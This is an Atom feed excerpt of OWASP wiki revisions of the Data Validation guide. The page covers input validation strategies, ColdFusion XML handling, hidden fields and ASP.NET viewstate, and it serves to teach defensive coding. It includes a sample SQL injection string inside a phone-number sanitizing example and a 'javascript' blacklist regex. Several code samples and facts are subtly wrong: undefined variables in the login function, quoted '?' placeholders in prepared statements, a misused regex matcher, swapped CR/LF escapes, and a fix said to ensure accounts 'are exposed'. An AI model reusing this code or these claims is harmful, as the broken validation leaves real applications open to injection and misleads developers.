Two parsers exist for XML data – SAX and DOM. ColdFusion uses DOM which reads the entire XML document into the server’s memory. This requires the administrator to restrict the size of the JVM containing ColdFusion.  ColdFusion is built on Java therefore by default, entity references are expanded during parsing. To prevent unbounded entity expansion, before a string is converted to an XML DOM, filter out DOCTYPES elements.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After the DOM has been read, to reduce the risk of XML Injection use the ColdFusion XML decision functions: isXML(), isXmlAttribute(), isXmlElement(), isXmlNode(), and isXmlRoot(). The isXML() function determines if a string is well-formed XML. The other functions determine whether or not the passed parameter is a valid part of an XML document. Use the xmlValidate() function to validate external XML documents against a Document Type Definition (DTD) or XML Schema.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Event Gateway, IM, and SMS Injection'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 enables Event Gateways, instant messaging (IM), and SMS (short message service) for interacting with external systems. Event Gateways are ColdFusion components that respond asynchronously to non-HTTP requests – e.g. instant messages, SMS text from wireless devices, etc. ColdFusion provides Lotus Sametime and XMPP (Extensible Messaging and Presence Protocol) gateways for instant messaging. It also provides an event gateway for interacting with SMS text messages.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Injection along these gateways can happen when end users (and/or systems) send malicious code to execute on the server. These gateways all utilize ColdFusion Components (CFCs) for processing. Use standard ColdFusion functions, tags, and validation techniques to protect against malicious code injection. Sanitize all input strings and do not allow un-validated code to access backend systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use the XML functions to validate XML input.&lt;br /&gt;
&lt;br /&gt;
*Before performing XPath searches and transformations in ColdFusion, validate the source before executing.&lt;br /&gt;
&lt;br /&gt;
*Use ColdFusion validation techniques to sanitize strings passed to xmlSearch for performing XPath queries. &lt;br /&gt;
&lt;br /&gt;
*When performing XML transformations only use a trusted source for the XSL stylesheet.&lt;br /&gt;
&lt;br /&gt;
*Ensure that the memory size of the Java Sandbox containing ColdFusion can handle large XML documents without adversely affecting server resources.&lt;br /&gt;
&lt;br /&gt;
*Set the memory value to less than the amount of RAM on the server (-Xmx).&lt;br /&gt;
&lt;br /&gt;
*Remove DOCTYPE elements from the XML string before converting it to an XML object.&lt;br /&gt;
&lt;br /&gt;
*Using scriptProtect can be used to thwart most attempts of cross-site scripting. Set scriptProtect to All in the Application.cfc.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfparam&amp;gt; or &amp;lt;cfargument&amp;gt; to instantiate variables in ColdFusion. Use this tag with the name and type attributes. If the value is not of the specified type, ColdFusion returns an error.&lt;br /&gt;
&lt;br /&gt;
*To handle untyped variables use IsValid() to validate its value against any legal object type that ColdFusion supports.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; to valid dynamic SQL variables against database datatypes.&lt;br /&gt;
&lt;br /&gt;
*Use CFLDAP for accessing LDAP servers. Avoid allowing native JNDI calls to connect to LDAP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice in Action'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The sample code below shows a database authentication function using some of the input validation techniques discussed in this section.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, uUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, uPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
FROM UserTable&lt;br /&gt;
&lt;br /&gt;
WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Delimiter and special characters ==&lt;br /&gt;
&lt;br /&gt;
There are many characters that mean something special to various programs. If you followed the advice only to accept characters that are considered good, it is very likely that only a few delimiters will catch you out. &lt;br /&gt;
&lt;br /&gt;
Here are the usual suspects:&lt;br /&gt;
&lt;br /&gt;
* NULL (zero) %00&lt;br /&gt;
&lt;br /&gt;
* LF - ANSI chr(10) &amp;quot;\r&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - ANSI chr(13) &amp;quot;\n&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CRLF - &amp;quot;\n\r&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - EBCDIC 0x0f &lt;br /&gt;
&lt;br /&gt;
* Quotes &amp;quot; '&lt;br /&gt;
&lt;br /&gt;
* Commas, slashes spaces and tabs and other white space - used in CSV, tab delimited output, and other specialist formats&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;&amp;gt; - XML and HTML tag markers, redirection characters&lt;br /&gt;
&lt;br /&gt;
* ; &amp;amp; - Unix and NT file system continuance&lt;br /&gt;
&lt;br /&gt;
* @ - used for e-mail addresses&lt;br /&gt;
&lt;br /&gt;
* 0xff&lt;br /&gt;
&lt;br /&gt;
* ... more&lt;br /&gt;
&lt;br /&gt;
Whenever you code to a particular technology, you should determine which characters are &amp;quot;special&amp;quot; and prevent them appearing in input, or properly escaping them.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ASP.NET 2.0 Viewstate&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://channel9.msdn.com/wiki/default.aspx/Channel9.HowToConfigureTheMachineKeyInASPNET2&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Validation]]&lt;br /&gt;
[[Category:Encoding]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59753</id>
		<title>Data Validation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59753"/>
				<updated>2009-05-01T12:11:00Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Selects, radio buttons, and checkboxes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is robust against all forms of input data, whether obtained from the user, infrastructure, external entities or database systems.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data. All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The most common web application security weakness is the failure to properly validate input from the client or environment. This weakness leads to almost all of the major vulnerabilities in applications, such as [[Interpreter Injection]], locale/Unicode attacks, file system attacks and buffer overflows. Data from the client should never be trusted for the client has every possibility to tamper with the data.&lt;br /&gt;
&lt;br /&gt;
In many cases, [[Encoding]] has the potential to defuse attacks that rely on lack of input validation. For example, if you use HTML entity encoding on user input before it is sent to a browser, it will prevent most [[Cross-site Scripting (XSS)|XSS]] attacks. However, simply preventing attacks is not enough - you must perform [[Intrusion Detection]] in your applications. Otherwise, you are allowing attackers to repeatedly attack your application until they find a vulnerability that you haven't protected against. Detecting attempts to find these weaknesses is a critical protection mechanism.&lt;br /&gt;
&lt;br /&gt;
==Definitions ==&lt;br /&gt;
&lt;br /&gt;
These definitions are used within this document:&lt;br /&gt;
&lt;br /&gt;
* '''Integrity checks'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data has not been tampered with and is the same as before&lt;br /&gt;
&lt;br /&gt;
* '''Validation'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data is strongly typed, correct syntax, within length boundaries, contains only permitted characters, or that numbers are correctly signed and within range boundaries &lt;br /&gt;
&lt;br /&gt;
* '''Business rules'''&lt;br /&gt;
&lt;br /&gt;
Ensure that data is not only validated, but business rule correct. For example, interest rates fall within permitted boundaries.&lt;br /&gt;
&lt;br /&gt;
Some documentation and references interchangeably use the various meanings, which is very confusing to all concerned. This confusion directly causes continuing financial loss to the organization. &lt;br /&gt;
&lt;br /&gt;
==Where to include integrity checks ==&lt;br /&gt;
&lt;br /&gt;
Integrity checks must be included wherever data passes from a trusted to a less trusted boundary, such as from the application to the user's browser in a hidden field, or to a third party payment gateway, such as a transaction ID used internally upon return. &lt;br /&gt;
&lt;br /&gt;
The type of integrity control (checksum, HMAC, encryption, digital signature) should be directly related to the risk of the data transiting the trust boundary. &lt;br /&gt;
&lt;br /&gt;
==Where to include validation ==&lt;br /&gt;
&lt;br /&gt;
Validation must be performed on every tier. However, validation should be performed as per the function of the server executing the code. For example, the web / presentation tier should validate for web related issues, persistence layers should validate for persistence issues such as SQL / HQL injection, directory lookups should check for LDAP injection, and so on.&lt;br /&gt;
&lt;br /&gt;
==Where to include business rule validation ==&lt;br /&gt;
&lt;br /&gt;
Business rules are known during design, and they influence implementation. However, there are bad, good and &amp;quot;best&amp;quot; approaches. Often the best approach is the simplest in terms of code. &lt;br /&gt;
&lt;br /&gt;
===Example - Scenario ===&lt;br /&gt;
&lt;br /&gt;
* You are to populate a list with accounts provided by the back-end system&lt;br /&gt;
* The user will choose an account, choose a biller, and press next&lt;br /&gt;
&lt;br /&gt;
===Wrong way===&lt;br /&gt;
&lt;br /&gt;
The account select option is read directly and provided in a message back to the backend system without validating the account number if one of the accounts provided by the backend system.&lt;br /&gt;
&lt;br /&gt;
===Why this is bad===&lt;br /&gt;
&lt;br /&gt;
An attacker can change the HTML in any way they choose:&lt;br /&gt;
&lt;br /&gt;
* The lack of validation requires a round-trip to the backend to provide an error message that the front end code could easily have eliminated&lt;br /&gt;
&lt;br /&gt;
* The back end may not be able to cope with the data payload the front-end code could have easily eliminated. For example, buffer overflows, XML injection, or similar. &lt;br /&gt;
&lt;br /&gt;
===Acceptable Method ===&lt;br /&gt;
&lt;br /&gt;
The account select option parameter (&amp;quot;payee_id&amp;quot;) is read by the code, and compared to an already-known list. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
if (account.hasPayee( session.getParameter(&amp;quot;payee_id&amp;quot;) )) {&lt;br /&gt;
    backend.performTransfer( session.getParameter(&amp;quot;payee_id&amp;quot;) );&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This prevents parameter tampering, but requires the list of possible payee_id's to be to be calculated beforehand.&lt;br /&gt;
&lt;br /&gt;
===Best Method ===&lt;br /&gt;
&lt;br /&gt;
The original code emitted indexes &amp;lt;option value=&amp;quot;1&amp;quot; ... &amp;gt; rather than account names.&lt;br /&gt;
&lt;br /&gt;
''int payeeLstId = session.getParameter('payeelstid');''&lt;br /&gt;
&lt;br /&gt;
''accountFrom = account.getAcctNumberByIndex(payeeLstId);''&lt;br /&gt;
&lt;br /&gt;
Not only is this easier to render in HTML, it makes validation and business rule validation trivial. The field cannot be tampered with.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- dkaplan: why is this the best?  I can see how it can make things easier to guess.  Where before I had to guess an account name, now I can just put in 9 if I see a list of id's from 1-8 and this code example doesn't directly check the integrity of that.  I think this needs more explanation. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Conclusion ===&lt;br /&gt;
&lt;br /&gt;
To provide defense in depth and to prevent attack payloads from trust boundaries, such as backend hosts, which are probably incapable of handling arbitrary input data, business rule validation is to be performed (preferably in workflow or command patterns), even if it is known that the back end code performs business rule validation.&lt;br /&gt;
&lt;br /&gt;
This is not to say that the entire set of business rules need be applied - it means that the fundamentals are performed to prevent unnecessary round trips to the backend and to prevent the backend from receiving most tampered data.&lt;br /&gt;
&lt;br /&gt;
==Data Validation Strategies ==&lt;br /&gt;
&lt;br /&gt;
There are four strategies for validating data, and they should be used in this order:&lt;br /&gt;
&lt;br /&gt;
===Accept known good===&lt;br /&gt;
&lt;br /&gt;
This strategy is also known as &amp;quot;whitelist&amp;quot; or &amp;quot;positive&amp;quot; validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn't match should be rejected.  Data should be:&lt;br /&gt;
&lt;br /&gt;
* Strongly typed at all times&lt;br /&gt;
* Length checked and fields length minimized&lt;br /&gt;
* Range checked if a numeric&lt;br /&gt;
* Unsigned unless required to be signed&lt;br /&gt;
* Syntax or grammar should be checked prior to first use or inspection&lt;br /&gt;
&lt;br /&gt;
If you expect a postcode, validate for a postcode (type, length and syntax):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String isPostcode(String postcode) {&lt;br /&gt;
    return (postcode != null &amp;amp;&amp;amp; Pattern.matches(&amp;quot;^(((2|8|9)\d{2})|((02|08|09)\d{2})|([1-9]\d{3}))$&amp;quot;, postcode)) ? postcode : &amp;quot;&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Coding guidelines should use some form of visible tainting on input from the client or untrusted sources, such as third party connectors to make it obvious that the input is unsafe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String taintPostcode = request.getParameter(&amp;quot;postcode&amp;quot;);&lt;br /&gt;
ValidationEngine validator = new ValidationEngine();&lt;br /&gt;
boolean isValidPostcode = validator.isPostcode(taintPostcode);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Reject known bad===&lt;br /&gt;
&lt;br /&gt;
This strategy, also known as &amp;quot;negative&amp;quot; or &amp;quot;blacklist&amp;quot; validation is a weak alternative to positive validation. Essentially, if you don't expect to see characters such as %3f or JavaScript or similar, reject strings containing them. This is a dangerous strategy, because the set of possible bad data is potentially infinite. Adopting this strategy means that you will have to maintain the list of &amp;quot;known bad&amp;quot; characters and patterns forever, and you will by definition have incomplete protection.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
public String removeJavascript(String input) {&lt;br /&gt;
&lt;br /&gt;
Pattern p = Pattern.compile(&amp;quot;javascript&amp;quot;, CASE_INSENSITIVE);&lt;br /&gt;
&lt;br /&gt;
p.matcher(input);&lt;br /&gt;
&lt;br /&gt;
return (!p.matches()) ? input : '';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
[[Category:FIXME|Is the CSS Cheat Sheet in the current development guide? I wanted to link to that and couldn't find it ]]&lt;br /&gt;
It can take upwards of 90 regular expressions (see the CSS Cheat Sheet in the Development Guide 2.0) to eliminate known malicious software, and each regex needs to be run over every field. Obviously, this is slow and not secure. Just rejecting &amp;quot;current known bad&amp;quot; (which is at the time of writing hundreds of strings and literally millions of combinations) is insufficient if the input is a string. This strategy is directly akin to anti-virus pattern updates. Unless the business will allow updating &amp;quot;bad&amp;quot; regexes on a daily basis and support someone to research new attacks regularly, this approach will be obviated before long.&lt;br /&gt;
&lt;br /&gt;
===Sanitize===&lt;br /&gt;
&lt;br /&gt;
Rather than accept or reject input, another option is to change the user input into an acceptable format&lt;br /&gt;
&lt;br /&gt;
==== Sanitize with Whitelist ====&lt;br /&gt;
&lt;br /&gt;
Any characters which are not part of an approved list can be removed, encoded or replaced.&lt;br /&gt;
&lt;br /&gt;
Here are some examples:&lt;br /&gt;
&lt;br /&gt;
If you expect a phone number, you can strip out all non-digit characters.  Thus, &amp;quot;(555)123-1234&amp;quot;, &amp;quot;555.123.1234&amp;quot;, and &amp;quot;555\&amp;quot;;DROP TABLE USER;--123.1234&amp;quot; all convert to 5551231234.  Note that you should proceed to validate the resulting numbers as well.  As you see, this is not only beneficial for security, but it also allows you to accept and use a wider range of valid user input.&lt;br /&gt;
&lt;br /&gt;
If you want text from a user comment form, it is difficult to decide on a legitimate set of characters because nearly every character has a legitimate use.  One solution is to replace all non alphanumeric characters with an encoded version, so &amp;quot;I like your web page&amp;quot;, might emerge from your sanitation routines as &amp;quot;I+like+your+web+page%21&amp;quot;.  (This example uses [http://en.wikipedia.org/wiki/Url_encoding URL encoding].)&lt;br /&gt;
&lt;br /&gt;
You can also go one step further.  Say you want to set up a site where users can upload arbitrary files so they can share them or download them again from another location.  In this case validation is impossible because there is no valid or invalid content.  Because your only concern is protecting your app from malicious input and you don't need to actually do anything except accept, store and transmit the file, you can encode the entire file in, say  [http://en.wikipedia.org/wiki/Base64 base 64].  &lt;br /&gt;
&lt;br /&gt;
==== Sanitize with Blacklist ====&lt;br /&gt;
&lt;br /&gt;
Eliminate or translate characters (such as to HTML entities or to remove quotes) in an effort to make the input &amp;quot;safe&amp;quot;. &lt;br /&gt;
Like blacklists, this approach requires maintenance and is usually incomplete. As most fields have a particular grammar, it is simpler, faster, and more secure to simply validate a single correct positive test than to try to include complex and slow sanitization routines for all current and future attacks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String quoteApostrophe(String input) {&lt;br /&gt;
    if (input != null)&lt;br /&gt;
        return input.replaceAll(&amp;quot;[\']&amp;quot;, &amp;quot;&amp;amp;amp;rsquo;&amp;quot;);&lt;br /&gt;
    else&lt;br /&gt;
        return null;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===No validation===&lt;br /&gt;
&lt;br /&gt;
This is inherently unsafe and strongly discouraged. The business must sign off each and every example of no validation as the lack of validation usually leads to direct obviation of application, host and network security controls.&lt;br /&gt;
&lt;br /&gt;
 account.setAcctId(getParameter('formAcctNo'));&lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 public setAcctId(String acctId) {&lt;br /&gt;
 	cAcctId = acctId;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==Prevent parameter tampering ==&lt;br /&gt;
&lt;br /&gt;
There are many input sources:&lt;br /&gt;
&lt;br /&gt;
* HTTP headers, such as REMOTE_ADDR, PROXY_VIA or similar&lt;br /&gt;
&lt;br /&gt;
* Environment variables, such as getenv() or via server properties &lt;br /&gt;
&lt;br /&gt;
* All GET, POST and Cookie data&lt;br /&gt;
&lt;br /&gt;
This includes supposedly tamper resistant fields such as radio buttons, drop downs, etc - any client side HTML can be re-written to suit the attacker&lt;br /&gt;
&lt;br /&gt;
Configuration data (mistakes happen :))&lt;br /&gt;
&lt;br /&gt;
External systems (via any form of input mechanism, such as XML input, RMI, web services, etc)&lt;br /&gt;
&lt;br /&gt;
All of these data sources supply untrusted input. Data received from untrusted data sources must be properly checked before first use.&lt;br /&gt;
&lt;br /&gt;
==Hidden fields ==&lt;br /&gt;
&lt;br /&gt;
Hidden fields are a simple way to avoid storing state on the server. Their use is particularly prevalent in &amp;quot;wizard-style&amp;quot; multi-page forms. However, their use exposes the inner workings of your application, and exposes data to trivial tampering, replay, and validation attacks. In general, only use hidden fields for page sequence.&lt;br /&gt;
&lt;br /&gt;
If you have to use hidden fields, there are some rules:&lt;br /&gt;
&lt;br /&gt;
* Secrets, such as passwords, should never be sent in the clear&lt;br /&gt;
&lt;br /&gt;
* Hidden fields need to have integrity checks and preferably encrypted using non-constant initialization vectors (i.e. different users at different times have different yet cryptographically strong random IVs)&lt;br /&gt;
&lt;br /&gt;
* Encrypted hidden fields must be robust against replay attacks, which means some form of temporal keying&lt;br /&gt;
&lt;br /&gt;
* Data sent to the user must be validated on the server once the last page has been received, even if it has been previously validated on the server - this helps reduce the risk from replay attacks.&lt;br /&gt;
&lt;br /&gt;
The preferred integrity control should be at least a HMAC using SHA-256 or preferably digitally signed or encrypted using PGP. IBMJCE supports SHA-256, but PGP JCE support require the inclusion of the Legion of the Bouncy Castle (http://www.bouncycastle.org/) JCE classes.&lt;br /&gt;
&lt;br /&gt;
It is simpler to store this data temporarily in the session object. Using the session object is the safest option as data is never visible to the user, requires (far) less code, nearly no CPU, disk or I/O utilization, less memory (particularly on large multi-page forms), and less network consumption. &lt;br /&gt;
&lt;br /&gt;
In the case of the session object being backed by a database, large session objects may become too large for the inbuilt handler. In this case, the recommended strategy is to store the validated data in the database, but mark the transaction as &amp;quot;incomplete.&amp;quot; Each page will update the incomplete transaction until it is ready for submission. This minimizes the database load, session size, and activity between the users whilst remaining tamperproof. &lt;br /&gt;
&lt;br /&gt;
Code containing hidden fields should be rejected during code reviews.&lt;br /&gt;
&lt;br /&gt;
==ASP.NET Viewstate ==&lt;br /&gt;
&lt;br /&gt;
ASP.NET sends form data back to the client in a hidden “Viewstate” field. Despite looking forbidding, this “encryption” is simply plain-text equivalent (base64 encoding) and has no data integrity without further action on your behalf in ASP.NET 1.0. In ASP.NET 1.1 and 2.0, tamper proofing, called &amp;quot;enableViewStateMAC&amp;quot; is on by default using a SHA-1 hash.&lt;br /&gt;
&lt;br /&gt;
Any application framework with a similar mechanism might be at fault – you should investigate your application framework’s support for sending data back to the user. Preferably it should not round trip.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
These configurations are set hierarchically in the .NET framework. The machine.config file contains the global configuration; each web directory may contain a web.config file further specifying or overriding configuration; each page may contain @page directives specifying same configuration or overrides; you must check all three locations:&lt;br /&gt;
&lt;br /&gt;
* If the enableViewStateMac is not set to “true”, you are at risk if your viewstate contains authorization state&lt;br /&gt;
&lt;br /&gt;
* If the viewStateEncryptionMode is not set to “always”, you are at risk if your viewstate contains secrets such as credentials&lt;br /&gt;
&lt;br /&gt;
* If you share a host with many other customers, you all share the same machine key by default in ASP.NET 1.1. In ASP.NET 2.0, it is possible to configure unique viewstate keys per application&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If your application relies on data returning from the viewstate without being tampered with, you should turn on viewstate integrity checks at the least, and strongly consider:&lt;br /&gt;
&lt;br /&gt;
* Encrypt viewstate if any of the data is application sensitive&lt;br /&gt;
&lt;br /&gt;
* Upgrade to ASP.NET 2.0 as soon as practical if you are on a shared hosting arrangement&lt;br /&gt;
&lt;br /&gt;
* Move truly sensitive viewstate data to the session variable instead&lt;br /&gt;
&lt;br /&gt;
===Selects, radio buttons, and checkboxes ===&lt;br /&gt;
&lt;br /&gt;
It is a commonly held belief that the value settings for these items cannot be easily tampered. This is wrong. In the following example, actual account numbers are used, which can lead to compromise:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(1).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(1).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(1).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(2).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This produces (for example):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341234&amp;quot;&amp;gt;Gold Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341235&amp;quot;&amp;gt;Platinum Card&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If the value is retrieved and then used directly in a SQL query, an interesting form of SQL injection may occur: authorization tampering leading to information disclosure. As the connection pool connects to the database using a single user, it may be possible to see other users' accounts if the SQL looks something like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String acctNo = getParameter('acctNo');&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acctNo = '?'&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This should be re-written to retrieve the account number via index, and include the client's unique ID to ensure that other valid account numbers are exposed:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&lt;br /&gt;
String acctNo = acct.getCardNumber(getParameter('acctIndex'));&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acct_id = '?' AND acctNo = '?'&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acct.getID());&lt;br /&gt;
&lt;br /&gt;
st.setString(2, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach requires rendering input values from 1 to ... x, and assuming accounts are stored in a Collection which can be iterated using logic:iterate:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;logic:iterate id=&amp;quot;loopVar&amp;quot; name=&amp;quot;MyForm&amp;quot; property=&amp;quot;values&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio property=&amp;quot;acctIndex&amp;quot; idName=&amp;quot;loopVar&amp;quot; value=&amp;quot;value&amp;quot;/&amp;gt;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
